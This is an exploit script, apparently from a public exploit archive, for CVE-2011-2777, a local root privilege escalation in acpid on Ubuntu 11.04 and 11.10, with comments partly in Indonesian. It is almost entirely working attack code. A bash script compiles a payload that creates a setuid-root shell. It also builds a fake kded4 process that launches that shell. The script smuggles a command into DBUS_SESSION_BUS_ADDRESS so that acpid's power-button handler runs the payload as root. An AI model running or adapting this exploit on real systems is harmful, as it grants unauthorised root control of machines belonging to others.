- ##################################################################
- # Exploit Title: Acpid Privilege Boundary Crossing Vulnerability #
- # Google Dork: #
- # Date: 23-11-2011 #
- # Author: otr #
- # Software Link: https://launchpad.net/ubuntu/+source/acpid #
- # Version: 1:2.0.10-1ubuntu2 #
- # Tested on: Ubuntu 11.10, Ubuntu 11.04 #
- # CVE : CVE-2011-2777 #
- ##################################################################
- #!/bin/bash
- PAYLOADEXE="/var/crash/payload"
- PAYLOADC="/var/crash/payload.c"
- KDEDC="kded4.c"
- KDEDEXE="kded4"
- TRIGGER="/etc/acpi/powerbtn.sh"
- rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
- echo "[+] Setting umask ke 0 untuk writable files."
- umask 0
- echo "[+] Preparing binary payload."
- # mencoba untuk mendapatkan suid root shell, jika tidak kita hanya akan mendapatkan
- # shell dari user lain
- cat > $PAYLOADC <<_EOF
- #include <sys/stat.h>
- void main(int argc, char **argv)
- {
- if(!strstr(argv[0],"shell")){
- printf("[+] Preparing suid shell.\n");
- system("cp /var/crash/payload /var/crash/shell");
- setuid(0);
- setgid(0);
- chown ("/var/crash/shell", 0, 0);
- chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
- }else{
- execl("/bin/sh", "/bin/sh", "-i", 0);
- }
- }
- _EOF
- gcc -w -o $PAYLOADEXE $PAYLOADC
- echo "[+] Preparing fake kded4 process."
- cat > $KDEDC <<_EOF
- #include <unistd.h>
- void main (){
- while(42){
- sleep(1);
- if( access( "/var/crash/shell" , F_OK ) != -1 ) {
- execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
- exit(0);
- }
- }
- }
- _EOF
- gcc -w -o $KDEDEXE $KDEDC
- rm -f $KDEDC $PAYLOADC
- echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
- export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
- echo "[+] Starting kded4."
- echo "[+] Trying to PMS the system."
- echo "[+] Menunggu Tombol power di tekan ."
- echo "[+] anda akan mendapatkan shell pada console ini."
- ./$KDEDEXE
- rm $KDEDEXE